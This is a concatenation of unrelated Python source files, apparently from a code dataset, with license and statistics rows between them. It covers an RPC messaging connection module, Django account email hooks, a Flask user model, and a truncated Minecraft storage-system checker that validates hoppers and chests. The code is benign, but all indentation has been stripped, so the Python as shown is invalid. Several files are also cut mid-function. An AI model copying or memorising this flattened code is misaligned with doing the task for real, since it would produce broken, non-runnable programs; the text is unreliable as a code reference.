LOG.exception(_('Failed to consume message from queue: %s') %
str(exc))
info['do_consume'] = True
def _consume():
if info['do_consume']:
queues_head = self.consumers[:-1]
queues_tail = self.consumers[-1]
for queue in queues_head:
queue.consume(nowait=True)
queues_tail.consume(nowait=False)
info['do_consume'] = False
return self.connection.drain_events(timeout=timeout)
for iteration in itertools.count(0):
if limit and iteration >= limit:
raise StopIteration
yield self.ensure(_error_callback, _consume)
def cancel_consumer_thread(self):
"""Cancel a consumer thread."""
if self.consumer_thread is not None:
self.consumer_thread.kill()
try:
self.consumer_thread.wait()
except greenlet.GreenletExit:
pass
self.consumer_thread = None
def wait_on_proxy_callbacks(self):
"""Wait for all proxy callback threads to exit."""
for proxy_cb in self.proxy_callbacks:
proxy_cb.wait()
def publisher_send(self, cls, topic, msg, timeout=None, **kwargs):
"""Send to a publisher based on the publisher class."""
def _error_callback(exc):
log_info = {'topic': topic, 'err_str': str(exc)}
LOG.exception(_("Failed to publish message to topic "
"'%(topic)s': %(err_str)s") % log_info)
def _publish():
publisher = cls(self.conf, self.channel, topic, **kwargs)
publisher.send(msg, timeout)
self.ensure(_error_callback, _publish)
def declare_direct_consumer(self, topic, callback):
"""Create a 'direct' queue.
In nova's use, this is generally a msg_id queue used for
responses for call/multicall
"""
self.declare_consumer(DirectConsumer, topic, callback)
def declare_topic_consumer(self, topic, callback=None, queue_name=None,
exchange_name=None):
"""Create a 'topic' consumer."""
self.declare_consumer(functools.partial(TopicConsumer,
name=queue_name,
exchange_name=exchange_name,
),
topic, callback)
def declare_fanout_consumer(self, topic, callback):
"""Create a 'fanout' consumer."""
self.declare_consumer(FanoutConsumer, topic, callback)
def direct_send(self, msg_id, msg):
"""Send a 'direct' message."""
self.publisher_send(DirectPublisher, msg_id, msg)
def topic_send(self, topic, msg, timeout=None):
"""Send a 'topic' message."""
self.publisher_send(TopicPublisher, topic, msg, timeout)
def fanout_send(self, topic, msg):
"""Send a 'fanout' message."""
self.publisher_send(FanoutPublisher, topic, msg)
def notify_send(self, topic, msg, **kwargs):
"""Send a notify message on a topic."""
self.publisher_send(NotifyPublisher, topic, msg, None, **kwargs)
def consume(self, limit=None):
"""Consume from all queues/consumers."""
it = self.iterconsume(limit=limit)
while True:
try:
it.next()
except StopIteration:
return
def consume_in_thread(self):
"""Consumer from all queues/consumers in a greenthread."""
@excutils.forever_retry_uncaught_exceptions
def _consumer_thread():
try:
self.consume()
except greenlet.GreenletExit:
return
if self.consumer_thread is None:
self.consumer_thread = eventlet.spawn(_consumer_thread)
return self.consumer_thread
def create_consumer(self, topic, proxy, fanout=False):
"""Create a consumer that calls a method in a proxy object."""
proxy_cb = rpc_amqp.ProxyCallback(
self.conf, proxy,
rpc_amqp.get_connection_pool(self.conf, Connection))
self.proxy_callbacks.append(proxy_cb)
if fanout:
self.declare_fanout_consumer(topic, proxy_cb)
else:
self.declare_topic_consumer(topic, proxy_cb)
def create_worker(self, topic, proxy, pool_name):
"""Create a worker that calls a method in a proxy object."""
proxy_cb = rpc_amqp.ProxyCallback(
self.conf, proxy,
rpc_amqp.get_connection_pool(self.conf, Connection))
self.proxy_callbacks.append(proxy_cb)
self.declare_topic_consumer(topic, proxy_cb, pool_name)
def join_consumer_pool(self, callback, pool_name, topic,
exchange_name=None):
"""Register as a member of a group of consumers for a given topic from
the specified exchange.
Exactly one member of a given pool will receive each message.
A message will be delivered to multiple pools, if more than
one is created.
"""
callback_wrapper = rpc_amqp.CallbackWrapper(
conf=self.conf,
callback=callback,
connection_pool=rpc_amqp.get_connection_pool(self.conf,
Connection),
)
self.proxy_callbacks.append(callback_wrapper)
self.declare_topic_consumer(
queue_name=pool_name,
topic=topic,
exchange_name=exchange_name,
callback=callback_wrapper,
)
def create_connection(conf, new=True):
"""Create a connection."""
return rpc_amqp.create_connection(
conf, new,
rpc_amqp.get_connection_pool(conf, Connection))
def multicall(conf, context, topic, msg, timeout=None):
"""Make a call that returns multiple times."""
return rpc_amqp.multicall(
conf, context, topic, msg, timeout,
rpc_amqp.get_connection_pool(conf, Connection))
def call(conf, context, topic, msg, timeout=None):
"""Sends a message on a topic and wait for a response."""
return rpc_amqp.call(
conf, context, topic, msg, timeout,
rpc_amqp.get_connection_pool(conf, Connection))
def cast(conf, context, topic, msg):
"""Sends a message on a topic without waiting for a response."""
return rpc_amqp.cast(
conf, context, topic, msg,
rpc_amqp.get_connection_pool(conf, Connection))
def fanout_cast(conf, context, topic, msg):
"""Sends a message on a fanout exchange without waiting for a response."""
return rpc_amqp.fanout_cast(
conf, context, topic, msg,
rpc_amqp.get_connection_pool(conf, Connection))
def cast_to_server(conf, context, server_params, topic, msg):
"""Sends a message on a topic to a specific server."""
return rpc_amqp.cast_to_server(
conf, context, server_params, topic, msg,
rpc_amqp.get_connection_pool(conf, Connection))
def fanout_cast_to_server(conf, context, server_params, topic, msg):
"""Sends a message on a fanout exchange to a specific server."""
return rpc_amqp.fanout_cast_to_server(
conf, context, server_params, topic, msg,
rpc_amqp.get_connection_pool(conf, Connection))
def notify(conf, context, topic, msg, envelope):
"""Sends a notification event on a topic."""
return rpc_amqp.notify(
conf, context, topic, msg,
rpc_amqp.get_connection_pool(conf, Connection),
envelope)
def cleanup():
return rpc_amqp.cleanup(Connection.pool)
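# Illustrative sketch, not part of the original module: typical callers use the
# module-level helpers, which draw Connection objects from the shared pool. A
# reachable RabbitMQ broker, registered rpc options and a valid request context
# are assumed; 'demo_topic' and the message body are made-up examples.
#
#     connection = create_connection(cfg.CONF)
#     connection.declare_topic_consumer('demo_topic', callback=print)
#     cast(cfg.CONF, context, 'demo_topic', {'method': 'ping', 'args': {}})
#     connection.consume(limit=1)
#     connection.close()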
|
apache-2.0
| -1,269,175,068,643,578,600
| 37.124851
| 79
| 0.558993
| false
| 4.416391
| false
| false
| false
|
raytung/Slice
|
account/hooks.py
|
1
|
2621
|
import hashlib
import random
from django.core.mail import send_mail
from django.template.loader import render_to_string
from account.conf import settings
from django.contrib.auth.models import User
from django.core.exceptions import ObjectDoesNotExist
class AccountDefaultHookSet(object):
def send_invitation_email(self, to, ctx):
subject = render_to_string("account/email/invite_user_subject.txt", ctx)
message = render_to_string("account/email/invite_user.txt", ctx)
send_mail(subject, message, settings.DEFAULT_FROM_EMAIL, to)
def send_confirmation_email(self, to, ctx):
subject = render_to_string("account/email/email_confirmation_subject.txt", ctx)
subject = "".join(subject.splitlines()) # remove superfluous line breaks
message = render_to_string("account/email/email_confirmation_message.txt", ctx)
send_mail(subject, message, settings.DEFAULT_FROM_EMAIL, to)
def send_password_change_email(self, to, ctx):
subject = render_to_string("account/email/password_change_subject.txt", ctx)
subject = "".join(subject.splitlines())
message = render_to_string("account/email/password_change.txt", ctx)
send_mail(subject, message, settings.DEFAULT_FROM_EMAIL, to)
def send_password_reset_email(self, to, ctx):
subject = render_to_string("account/email/password_reset_subject.txt", ctx)
subject = "".join(subject.splitlines())
message = render_to_string("account/email/password_reset.txt", ctx)
send_mail(subject, message, settings.DEFAULT_FROM_EMAIL, to)
def generate_random_token(self, extra=None, hash_func=hashlib.sha256):
if extra is None:
extra = []
bits = extra + [str(random.SystemRandom().getrandbits(512))]
return hash_func("".join(bits).encode("utf-8")).hexdigest()
def generate_signup_code_token(self, email=None):
return self.generate_random_token([email])
def generate_email_confirmation_token(self, email):
return self.generate_random_token([email])
def get_user_credentials(self, form, identifier_field):
try:
username = User.objects.get(email=form.cleaned_data[identifier_field])
username = username.username
except ObjectDoesNotExist:
username = form.cleaned_data[identifier_field]
return {
"username": username,
"password": form.cleaned_data["password"],
}
class HookProxy(object):
def __getattr__(self, attr):
return getattr(settings.ACCOUNT_HOOKSET, attr)
hookset = HookProxy()
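# Illustrative sketch, not part of the original module: callers resolve hook
# methods through the proxy above, so the active hookset can be swapped via the
# ACCOUNT_HOOKSET setting without touching call sites. The address is a made-up
# example.
#
#     token = hookset.generate_email_confirmation_token('user@example.com')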
|
mit
| -1,658,567,781,542,435,800
| 38.119403
| 87
| 0.679893
| false
| 3.917788
| false
| false
| false
|
anselal/antminer-monitor
|
antminermonitor/blueprints/user/models.py
|
1
|
1102
|
from flask_login.mixins import UserMixin
from werkzeug.security import generate_password_hash, check_password_hash
from sqlalchemy import Column, Integer, VARCHAR
from antminermonitor.database import Base
class User(UserMixin, Base):
__tablename__ = 'user'
id = Column(Integer, primary_key=True)
username = Column(VARCHAR(64), index=True, unique=True)
email = Column(VARCHAR(120), index=True, unique=True)
password_hash = Column(VARCHAR(128))
surname = Column(VARCHAR(100))
firstname = Column(VARCHAR(100))
active = Column(Integer, default=1)
@property
def serialize(self):
return {
'id': self.id,
'username': self.username,
'firstname': self.firstname,
'surname': self.surname,
'email': self.email
}
def __repr__(self):
return '<User {}>'.format(self.username)
def set_password(self, password):
self.password_hash = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.password_hash, password)
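# Illustrative usage sketch, not part of the original module: 'hunter2' is a
# made-up password and no database session is involved; this only exercises the
# werkzeug hashing helpers wrapped by set_password()/check_password().
if __name__ == '__main__':  # pragma: no cover
    user = User(username='demo', email='demo@example.com')
    user.set_password('hunter2')
    assert user.check_password('hunter2')
    assert not user.check_password('wrong password')
    print(user.serialize)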
|
gpl-3.0
| 8,158,068,241,093,129,000
| 30.485714
| 73
| 0.653358
| false
| 3.978339
| false
| false
| false
|
wurstmineberg/alltheitems.wurstmineberg.de
|
alltheitems/cloud.py
|
1
|
67724
|
import alltheitems.__main__ as ati
import bottle
import collections
import contextlib
import datetime
import itertools
import json
import pathlib
import random
import re
import xml.sax.saxutils
import alltheitems.item
import alltheitems.util
import alltheitems.world
class FillLevel:
def __init__(self, stack_size, total_items, max_slots, *, is_smart_chest=True):
self.stack_size = stack_size
self.total_items = total_items
self.max_slots = max_slots
self.is_smart_chest = is_smart_chest
def __str__(self):
if self.total_items == 0:
return '{} is empty.'.format('SmartChest' if self.is_smart_chest else 'Chest')
elif self.total_items == self.max_items:
return '{} is full.'.format('SmartChest' if self.is_smart_chest else 'Chest')
else:
stacks, items = self.stacks
return '{} is filled {}% ({} {stack}{}{} out of {} {stack}s).'.format('SmartChest' if self.is_smart_chest else 'Chest', int(100 * self.fraction), stacks, '' if stacks == 1 else 's', ' and {} item{}'.format(items, '' if items == 1 else 's') if items > 0 else '', self.max_slots, stack='item' if self.stack_size == 1 else 'stack')
@property
def fraction(self):
return self.total_items / self.max_items
def is_empty(self):
return self.total_items == 0
def is_full(self):
return self.total_items == self.max_items
@property
def max_items(self):
return self.max_slots * self.stack_size
@property
def stacks(self):
return divmod(self.total_items, self.stack_size)
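# Illustrative sketch (made-up numbers): a chest column with room for 10 stacks
# of a 64-stackable item, currently holding 130 items.
#
#     level = FillLevel(64, 130, 10)
#     level.fraction   # -> 130 / 640 = 0.203125
#     str(level)       # -> 'SmartChest is filled 20% (2 stacks and 2 items out of 10 stacks).'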
CONTAINERS = [ # layer coords of all counted container blocks in a SmartChest
(3, -7, 3),
(3, -7, 4),
(4, -7, 4),
(5, -7, 3),
(5, -7, 4),
(2, -6, 3),
(3, -6, 2),
(3, -6, 3),
(2, -5, 2),
(2, -5, 3),
(3, -5, 3),
(2, -4, 3),
(3, -4, 2),
(3, -4, 3),
(3, -3, 2),
(4, -3, 2),
(5, -3, 2),
(6, -3, 2),
(5, -2, 2),
(6, -2, 2),
(5, 0, 2),
(5, 0, 3)
]
STONE_VARIANTS = {
0: 'stone',
1: 'granite',
2: 'polished granite',
3: 'diorite',
4: 'polished diorite',
5: 'andesite',
6: 'polished andesite'
}
HOPPER_FACINGS = {
0: 'down',
1: 'up', #for droppers
2: 'north',
3: 'south',
4: 'west',
5: 'east'
}
TORCH_FACINGS = {
1: 'to its west',
2: 'to its east',
3: 'to its north',
4: 'to its south',
5: 'below'
}
HTML_COLORS = {
'cyan': '#0ff',
'cyan2': '#0ff',
'gray': '#777',
'red': '#f00',
'orange': '#f70',
'yellow': '#ff0',
'white': '#fff',
'white2': '#fff',
None: 'transparent'
}
def hopper_chain_connected(start_coords, end_coords, *, world=None, chunk_cache=None, block_at=None):
if world is None:
world = alltheitems.world.World()
if chunk_cache is None:
chunk_cache = {}
if block_at is None:
block_at=world.block_at
visited_coords = set()
x, y, z = start_coords
while (x, y, z) != end_coords:
if (x, y, z) in visited_coords:
return False, 'hopper chain points into itself at {} {} {}'.format(x, y, z)
visited_coords.add((x, y, z))
block = block_at(x, y, z, chunk_cache=chunk_cache)
if block['id'] != 'minecraft:hopper':
return False, 'block at {} {} {} is not a <a href="/block/minecraft/hopper">hopper</a>'.format(x, y, z, *end_coords)
if block['damage'] & 0x7 == 0:
y -= 1 # down
elif block['damage'] & 0x7 == 2:
z -= 1 # north
elif block['damage'] & 0x7 == 3:
z += 1 # south
elif block['damage'] & 0x7 == 4:
x -= 1 # west
elif block['damage'] & 0x7 == 5:
x += 1 # east
else:
raise ValueError('Unknown hopper facing {} at {}'.format(block['damage'] & 0x7, (x, y, z)))
return True, None
def smart_chest_schematic(document_root=ati.document_root):
layers = {}
with (document_root / 'static' / 'smartchest.txt').open() as smart_chest_layers:
current_y = None
current_layer = None
for line in smart_chest_layers:
if line == '\n':
continue
match = re.fullmatch('layer (-?[0-9]+)\n', line)
if match:
# new layer
if current_y is not None:
layers[current_y] = current_layer
current_y = int(match.group(1))
current_layer = []
else:
current_layer.append(line.rstrip('\r\n'))
if current_y is not None:
layers[current_y] = current_layer
return sorted(layers.items())
def chest_iter():
"""Returns an iterator yielding tuples (x, corridor, y, floor, z, chest)."""
with (ati.assets_root / 'json' / 'cloud.json').open() as cloud_json:
cloud_data = json.load(cloud_json)
for y, floor in enumerate(cloud_data):
for x, corridor in sorted(((int(x), corridor) for x, corridor in floor.items()), key=lambda tup: tup[0]):
for z, chest in enumerate(corridor):
yield x, corridor, y, floor, z, chest
def chest_coords(item, *, include_meta=False):
if not isinstance(item, alltheitems.item.Item):
item = alltheitems.item.Item(item)
for x, corridor, y, _, z, chest in chest_iter():
if item == chest:
if include_meta:
return (x, y, z), len(corridor), None if isinstance(chest, str) else chest.get('name'), None if isinstance(chest, str) else chest.get('sorter')
else:
return x, y, z
if include_meta:
return None, 0, None, None
def global_error_checks(*, chunk_cache=None, block_at=alltheitems.world.World().block_at):
cache_path = ati.cache_root / 'cloud-globals.json'
max_age = datetime.timedelta(hours=1, minutes=random.randrange(0, 60)) # use a random value between 1 and 2 hours for the cache expiration
if cache_path.exists() and datetime.datetime.utcfromtimestamp(cache_path.stat().st_mtime) > datetime.datetime.utcnow() - max_age:
# cached check results are recent enough
with cache_path.open() as cache_f:
cache = json.load(cache_f)
return cache
# cached check results are too old, recheck
if chunk_cache is None:
chunk_cache = {}
# error check: input hopper chain
start = 14, 61, 32 # the first hopper after the buffer elevator
end = -1, 25, 52 # the half of the uppermost overflow chest into which the hopper chain is pointing
is_connected, message = hopper_chain_connected(start, end, chunk_cache=chunk_cache, block_at=block_at)
if not is_connected:
return 'Input hopper chain at {} is not connected to the unsorted overflow at {}: {}.'.format(start, end, message)
if ati.cache_root.exists():
with cache_path.open('w') as cache_f:
json.dump(message, cache_f, sort_keys=True, indent=4)
def chest_error_checks(x, y, z, base_x, base_y, base_z, item, item_name, exists, stackable, durability, has_smart_chest, has_sorter, has_overflow, filler_item, sorting_hopper, missing_overflow_hoppers, north_half, south_half, corridor_length, pre_sorter, layer_coords, block_at, items_data, chunk_cache, document_root):
if stackable and has_sorter:
# error check: overflow exists
if not has_overflow:
if len(missing_overflow_hoppers) == 3:
return 'Missing overflow hoppers.'
elif len(missing_overflow_hoppers) > 1:
return 'Overflow hoppers at x={} do not exist.'.format(missing_overflow_hoppers)
elif len(missing_overflow_hoppers) == 1:
return 'Overflow hopper at x={} does not exist, is {}.'.format(next(iter(missing_overflow_hoppers)), block_at(next(iter(missing_overflow_hoppers)), base_y - 7, base_z - 1)['id'])
else:
return 'Missing overflow.'
# error check: pre-sorter for lower floors
if y > 4:
if pre_sorter is None:
return 'Preliminary sorter coordinate missing from cloud.json.'
pre_sorting_hopper = block_at(pre_sorter, 30, 52, chunk_cache=chunk_cache)
if pre_sorting_hopper['id'] != 'minecraft:hopper':
return 'Preliminary sorter is missing (should be at {} 30 52).'.format(pre_sorter)
if pre_sorting_hopper['damage'] != 3:
return 'Preliminary sorting hopper ({} 30 52) should be pointing south, but is facing {}.'.format(pre_sorter, HOPPER_FACINGS[pre_sorting_hopper['damage']])
empty_slots = set(range(5))
for slot in pre_sorting_hopper['tileEntity']['Items']:
empty_slots.remove(slot['Slot'])
if slot['Slot'] == 0:
if not item.matches_slot(slot):
return 'Preliminary sorting hopper is sorting the wrong item: {}.'.format(alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text())
else:
if not filler_item.matches_slot(slot):
return 'Preliminary sorting hopper has wrong filler item in slot {}: {} (should be {}).'.format(slot['Slot'], alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text(), filler_item.link_text())
if slot['Count'] > 1:
return 'Preliminary sorting hopper: too much {} in slot {}.'.format(filler_item.link_text(), slot['Slot'])
if len(empty_slots) > 0:
if len(empty_slots) == 5:
return 'Preliminary sorting hopper is empty.'
elif len(empty_slots) == 1:
return 'Slot {} of the preliminary sorting hopper is empty.'.format(next(iter(empty_slots)))
else:
return 'Some slots in the preliminary sorting hopper are empty: {}.'.format(alltheitems.util.join(empty_slots))
if has_sorter:
# error check: sorting hopper
if sorting_hopper['damage'] != 2:
return 'Sorting hopper ({} {} {}) should be pointing north, but is facing {}.'.format(base_x - 2 if z % 2 == 0 else base_x + 2, base_y - 3, base_z, HOPPER_FACINGS[sorting_hopper['damage']])
empty_slots = set(range(5))
for slot in sorting_hopper['tileEntity']['Items']:
empty_slots.remove(slot['Slot'])
if slot['Slot'] == 0 and stackable:
if not item.matches_slot(slot) and not filler_item.matches_slot(slot):
return 'Sorting hopper is sorting the wrong item: {}.'.format(alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text())
else:
if not filler_item.matches_slot(slot):
return 'Sorting hopper has wrong filler item in slot {}: {} (should be {}).'.format(slot['Slot'], alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text(), filler_item.link_text())
if slot['Count'] > 1:
return 'Sorting hopper: too much {} in slot {}.'.format(filler_item.link_text(), slot['Slot'])
if len(empty_slots) > 0:
if len(empty_slots) == 5:
return 'Sorting hopper is empty.'
elif len(empty_slots) == 1:
return 'Slot {} of the sorting hopper is empty.'.format(next(iter(empty_slots)))
else:
return 'Some slots in the sorting hopper are empty: {}.'.format(alltheitems.util.join(empty_slots))
if exists:
# error check: wrong items in access chest
for slot in itertools.chain(north_half['tileEntity']['Items'], south_half['tileEntity']['Items']):
if not item.matches_slot(slot):
return 'Access chest contains items of the wrong kind: {}.'.format(alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text())
# error check: wrong name on sign
sign = block_at(base_x - 1 if z % 2 == 0 else base_x + 1, base_y + 1, base_z + 1, chunk_cache=chunk_cache)
if sign['id'] != 'minecraft:wall_sign':
return 'Sign is missing.'
text = []
for line in range(1, 5):
line_text = json.loads(sign['tileEntity']['Text{}'.format(line)])['text'].translate(dict.fromkeys(range(0xf700, 0xf704), None))
if len(line_text) > 0:
text.append(line_text)
text = ' '.join(text)
if text != item_name.translate({0x2161: 'II'}):
return 'Sign has wrong text: should be {!r}, is {!r}.'.format(xml.sax.saxutils.escape(item_name), xml.sax.saxutils.escape(text))
if has_overflow:
# error check: overflow hopper chain
start = base_x + 5 if z % 2 == 0 else base_x - 5, base_y - 7, base_z - 1
end = -35, 6, 38 # position of the dropper leading into the Smelting Center's item elevator
is_connected, message = hopper_chain_connected(start, end, chunk_cache=chunk_cache, block_at=block_at)
if not is_connected:
return 'Overflow hopper chain at {} is not connected to the Smelting Center item elevator at {}: {}.'.format(start, end, message)
if exists and has_smart_chest:
# error check: all blocks
for layer_y, layer in smart_chest_schematic(document_root=document_root):
for layer_x, row in enumerate(layer):
for layer_z, block_symbol in enumerate(row):
# determine the coordinate of the current block
exact_x, exact_y, exact_z = layer_coords(layer_x, layer_y, layer_z)
# determine current block
block = block_at(exact_x, exact_y, exact_z, chunk_cache=chunk_cache)
# check against schematic
if block_symbol == ' ':
# air
if block['id'] != 'minecraft:air':
return 'Block at {} {} {} should be air, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
elif block_symbol == '!':
# sign
if block['id'] != 'minecraft:wall_sign':
return 'Block at {} {} {} should be a sign, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] != (4 if z % 2 == 0 else 5):
return 'Sign at {} {} {} is facing the wrong way.'.format(exact_x, exact_y, exact_z)
elif block_symbol == '#':
# chest
if block['id'] != 'minecraft:chest':
return 'Block at {} {} {} should be a chest, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
for slot in block['tileEntity']['Items']:
if not item.matches_slot(slot):
return 'Storage chest at {} {} {} contains items of the wrong kind: {}.'.format(exact_x, exact_y, exact_z, alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text())
elif block_symbol == '<':
# hopper facing south
if block['id'] != 'minecraft:hopper':
return 'Block at {} {} {} should be a hopper, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] & 0x7 != 3: # south
return 'Hopper at {} {} {} should be pointing south, is {}.'.format(exact_x, exact_y, exact_z, HOPPER_FACINGS[block['damage']])
storage_hoppers = {
(5, -7, 4),
(6, -5, 4)
}
if (layer_x, layer_y, layer_z) in storage_hoppers:
for slot in block['tileEntity']['Items']:
if not item.matches_slot(slot):
return 'Storage hopper at {} {} {} contains items of the wrong kind: {}.'.format(exact_x, exact_y, exact_z, alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text())
elif block_symbol == '>':
# hopper facing north
if layer_y == -7 and layer_x == 0 and z < 8:
# the first few chests get ignored because their overflow points in the opposite direction
pass #TODO introduce special checks for them
else:
if block['id'] != 'minecraft:hopper':
return 'Block at {} {} {} should be a hopper, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] & 0x7 != 2: # north
return 'Hopper at {} {} {} should be pointing north, is {}.'.format(exact_x, exact_y, exact_z, HOPPER_FACINGS[block['damage']])
storage_hoppers = {
(3, -7, 3),
(3, -4, 2)
}
if (layer_x, layer_y, layer_z) in storage_hoppers:
for slot in block['tileEntity']['Items']:
if not item.matches_slot(slot):
return 'Storage hopper at {} {} {} contains items of the wrong kind: {}.'.format(exact_x, exact_y, exact_z, alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text())
elif block_symbol == '?':
# any block
pass
elif block_symbol == 'C':
# comparator
if block['id'] != 'minecraft:unpowered_comparator':
return 'Block at {} {} {} should be a comparator, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
known_facings = {
(5, -7, 2): 0x2, # south
(5, -5, 2): 0x2, # south
(7, -3, 4): 0x0, # north
(0, -1, 1): 0x0, # north
(1, -1, 2): 0x0, # north
(2, 0, 2): 0x1 if z % 2 == 0 else 0x3, # east / west
(2, 0, 3): 0x2, # south
(4, 0, 2): 0x1 if z % 2 == 0 else 0x3, # east / west
(4, 0, 3): 0x2 # south
}
facing = block['damage'] & 0x3
if (layer_x, layer_y, layer_z) in known_facings:
if known_facings[layer_x, layer_y, layer_z] != facing:
return 'Comparator at {} {} {} is facing the wrong way.'.format(exact_x, exact_y, exact_z)
else:
return 'Direction check for comparator at {} {} {} (relative coords: {} {} {}) not yet implemented.'.format(exact_x, exact_y, exact_z, layer_x, layer_y, layer_z)
known_modes = {
(5, -7, 2): False, # compare
(5, -5, 2): False, # compare
(7, -3, 4): False, # compare
(0, -1, 1): False, # compare
(1, -1, 2): True, # subtract
(2, 0, 2): True, # subtract
(2, 0, 3): False, # compare
(4, 0, 2): True, #subtract
(4, 0, 3): False # compare
}
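# bit 0x4 of the comparator's damage value encodes its mode: set means subtraction, cleared means comparison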
mode = (block['damage'] & 0x4) == 0x4
if (layer_x, layer_y, layer_z) in known_modes:
if known_modes[layer_x, layer_y, layer_z] != mode:
return 'Comparator at {} {} {} is in {} mode, should be in {} mode.'.format(exact_x, exact_y, exact_z, 'subtraction' if mode else 'comparison', 'subtraction' if known_modes[layer_x, layer_y, layer_z] else 'comparison')
else:
return 'Mode check for comparator at {} {} {} (relative coords: {} {} {}) not yet implemented.'.format(exact_x, exact_y, exact_z, layer_x, layer_y, layer_z)
elif block_symbol == 'D':
# dropper facing up
if block['id'] != 'minecraft:dropper':
return 'Block at {} {} {} should be a dropper, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] & 0x7 != 1: # up
return 'Dropper at {} {} {} should be facing up, is {}.'.format(exact_x, exact_y, exact_z, HOPPER_FACINGS[block['damage']])
for slot in block['tileEntity']['Items']:
if not item.matches_slot(slot):
return 'Dropper at {} {} {} contains items of the wrong kind: {}.'.format(exact_x, exact_y, exact_z, alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text())
elif block_symbol == 'F':
# furnace
if layer_y == -6 and layer_x == 0 and z < 2:
# the first few chests get ignored because their overflow points in the opposite direction
pass #TODO introduce special checks for them
elif layer_y == -1 and layer_x == 7 and layer_z == 1 and (z == corridor_length - 1 or z == corridor_length - 2 and z % 2 == 0):
# the floor ends with a quartz slab instead of a furnace here
if block['id'] != 'minecraft:stone_slab':
return 'Block at {} {} {} should be a quartz slab, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] & 0x7 != 0x7:
slab_variant = {
0: 'stone',
1: 'sandstone',
2: 'fake wood',
3: 'cobblestone',
4: 'brick',
5: 'stone brick',
6: 'Nether brick',
7: 'quartz'
}[block['damage'] & 0x7]
return 'Block at {} {} {} should be a <a href="/block/minecraft/stone_slab/7">quartz slab</a>, is a <a href="/block/minecraft/stone_slab/{}">{} slab</a>.'.format(exact_x, exact_y, exact_z, block['damage'] & 0x7, slab_variant)
if block['damage'] & 0x8 != 0x8:
return 'Quartz slab at {} {} {} should be a top slab, is a bottom slab.'.format(exact_x, exact_y, exact_z)
elif x == 0 and y == 6 and layer_y == -1 and layer_x == 7:
# the central corridor on the 6th floor uses stone bricks instead of furnaces for the floor
if block['id'] != 'minecraft:stonebrick':
return 'Block at {} {} {} should be stone bricks, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] != 0:
stonebrick_variant = {
0: 'regular',
1: 'mossy',
2: 'cracked',
3: 'chiseled'
}[block['damage']]
return 'Block at {} {} {} should be <a href="/block/minecraft/stonebrick/0">regular stone bricks</a>, is <a href="/block/minecraft/stonebrick/{}">{} stone bricks</a>.'.format(exact_x, exact_y, exact_z, block['damage'], stonebrick_variant)
else:
if block['id'] != 'minecraft:furnace':
return 'Block at {} {} {} should be a furnace, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
known_signals = {
(0, -6, 4): 0,
(0, -6, 5): 0,
(0, -6, 6): 0,
(0, -6, 7): 0,
(0, -1, 0): 8,
(7, -1, 1): 0,
(7, -1, 2): 0,
(7, -1, 3): 0,
(7, -1, 4): 0,
(2, 0, 4): 1,
(4, 0, 4): 5
}
signal = alltheitems.item.comparator_signal(block, items_data=items_data)
if (layer_x, layer_y, layer_z) in known_signals:
if known_signals[layer_x, layer_y, layer_z] != signal:
return 'Furnace at {} {} {} has a fill level of {}, should be {}.'.format(exact_x, exact_y, exact_z, signal, known_signals[layer_x, layer_y, layer_z])
else:
return 'Fill level check for furnace at {} {} {} (relative coords: {} {} {}) not yet implemented.'.format(exact_x, exact_y, exact_z, layer_x, layer_y, layer_z)
elif block_symbol == 'G':
# glowstone
if block['id'] != 'minecraft:glowstone':
return 'Block at {} {} {} should be glowstone, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
elif block_symbol == 'H':
# hopper, any facing
if block['id'] != 'minecraft:hopper':
return 'Block at {} {} {} should be a hopper, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
elif block_symbol == 'N':
# overflow hopper chain pointing north
if y > 1 and (z == 0 or z == 1):
if block['id'] == 'minecraft:hopper':
if block['damage'] != 2: # north
return 'Overflow hopper at {} {} {} should be pointing north, is {}.'.format(exact_x, exact_y, exact_z, HOPPER_FACINGS[block['damage']])
elif block['id'] == 'minecraft:air':
pass # also allow air because some overflow hopper chains don't start on the first floor
else:
return 'Block at {} {} {} should be a hopper, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
else:
if block['id'] != 'minecraft:air':
return 'Block at {} {} {} should be air, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
elif block_symbol == 'P':
# upside-down oak stairs
if block['id'] != 'minecraft:oak_stairs':
return 'Block at {} {} {} should be oak stairs, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] & 0x3 != (0x1 if z % 2 == 0 else 0x0):
stairs_facings = {
0: 'west',
1: 'east',
2: 'south',
3: 'north'
}
return 'Stairs at {} {} {} should be facing {}, is {}.'.format(exact_x, exact_y, exact_z, stairs_facings[0x1 if z % 2 == 0 else 0x0], stairs_facings[block['damage'] & 0x3])
if block['damage'] & 0x4 != 0x4:
return 'Stairs at {} {} {} should be upside-down.'.format(exact_x, exact_y, exact_z)
elif block_symbol == 'Q':
# quartz top slab
if block['id'] != 'minecraft:stone_slab':
return 'Block at {} {} {} should be a quartz slab, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] & 0x7 != 0x7:
slab_variant = {
0: 'stone',
1: 'sandstone',
2: 'fake wood',
3: 'cobblestone',
4: 'brick',
5: 'stone brick',
6: 'Nether brick',
7: 'quartz'
}[block['damage'] & 0x7]
return 'Block at {} {} {} should be a <a href="/block/minecraft/stone_slab/7">quartz slab</a>, is a <a href="/block/minecraft/stone_slab/{}">{} slab</a>.'.format(exact_x, exact_y, exact_z, block['damage'] & 0x7, slab_variant)
if block['damage'] & 0x8 != 0x8:
